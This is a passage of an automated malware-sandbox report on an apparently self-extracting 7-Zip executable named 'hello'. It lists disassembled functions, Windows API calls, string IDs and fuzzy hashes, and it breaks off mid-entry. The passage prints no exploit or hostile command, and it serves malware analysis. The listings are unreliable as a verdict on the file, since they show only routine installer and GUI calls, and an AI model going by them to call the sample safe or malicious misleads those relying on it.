                                        • Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
                                        • Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                        • Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
                                        • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
                                        • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID: %%M/$%%M\
                                        • API String ID: 613200358-4143866494
                                        • Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                        • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
                                        • Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                        • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                                        APIs
                                        • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow
                                        • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                                        • API String ID: 432778473-803145960
                                        • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                        • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                                        • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                        • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                                        APIs
                                          • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D
                                          • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                          • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                          • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??2@$??3@$memmove
                                        • String ID: IA$IA$IA
                                        • API String ID: 4294387087-924693538
                                        • Opcode ID: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                        • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
                                        • Opcode Fuzzy Hash: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                        • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                                        APIs
                                        • _CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
                                        • ??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
                                        • memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
                                        • ??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??2@??3@ExceptionThrowmemcpy
                                        • String ID: IA
                                        • API String ID: 3462485524-3293647318
                                        • Opcode ID: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                        • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                                        • Opcode Fuzzy Hash: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                        • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: wsprintf$ExitProcesslstrcat
                                        • String ID: 0x%p
                                        • API String ID: 2530384128-1745605757
                                        • Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                        • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                                        • Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                        • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                                        APIs
                                          • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                                          • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                                        • GetSystemMetrics.USER32(00000007), ref: 00407A51
                                        • GetSystemMetrics.USER32(00000007), ref: 00407A62
                                        • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: MetricsSystem$??3@
                                        • String ID: 100%%
                                        • API String ID: 2562992111-568723177
                                        • Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                        • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                                        • Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                        • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
                                        APIs
                                        • wsprintfW.USER32 ref: 00407A12
                                          • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                          • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                        • GetDlgItem.USER32(?,000004B3), ref: 004079C6
                                          • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                          • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: TextWindow$ItemLength$??3@wsprintf
                                        • String ID: (%u%s)
                                        • API String ID: 3595513934-2496177969
                                        • Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                        • Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
                                        • Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                        • Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
                                        • GetProcAddress.KERNEL32(00000000), ref: 00402211
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetNativeSystemInfo$kernel32
                                        • API String ID: 2574300362-3846845290
                                        • Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                        • Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
                                        • Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                        • Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040219F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: Wow64RevertWow64FsRedirection$kernel32
                                        • API String ID: 2574300362-3900151262
                                        • Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                        • Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
                                        • Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                        • Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
                                        • GetProcAddress.KERNEL32(00000000), ref: 004021D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: Wow64DisableWow64FsRedirection$kernel32
                                        • API String ID: 2574300362-736604160
                                        • Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                        • Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
                                        • Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                        • Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                          • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@$ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 1731127917-0
                                        • Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                        • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                                        • Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                        • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
                                        APIs
                                        • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                                        • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                                        • wsprintfW.USER32 ref: 00403FFB
                                        • GetFileAttributesW.KERNEL32(?), ref: 00404016
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: PathTemp$AttributesFilewsprintf
                                        • String ID:
                                        • API String ID: 1746483863-0
                                        • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                        • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                                        • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                        • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                                        APIs
                                        • CharUpperW.USER32(?,771AE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                        • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                        • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                                        • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: CharUpper
                                        • String ID:
                                        • API String ID: 9403516-0
                                        • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                        • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                                        • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                        • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                                        APIs
                                          • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                          • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                          • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                                        • GetDlgItem.USER32(?,000004B7), ref: 00408020
                                        • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                                          • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                          • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                          • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                          • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                          • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                          • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                          • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                          • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                          • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                          • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                          • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                          • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                                        • String ID:
                                        • API String ID: 2538916108-0
                                        • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                        • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                                        • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                        • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                                        APIs
                                        • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                                        • GetSystemMetrics.USER32(00000031), ref: 0040683A
                                        • CreateFontIndirectW.GDI32(?), ref: 00406849
                                        • DeleteObject.GDI32(00000000), ref: 00406878
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                        • String ID:
                                        • API String ID: 1900162674-0
                                        • Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                        • Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
                                        • Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                        • Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54
                                        APIs
                                        • memset.MSVCRT ref: 0040749F
                                        • SHBrowseForFolderW.SHELL32(?), ref: 004074B8
                                        • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
                                        • SHGetMalloc.SHELL32(00000000), ref: 004074FE
                                          • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                          • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                        Memory Dump Source
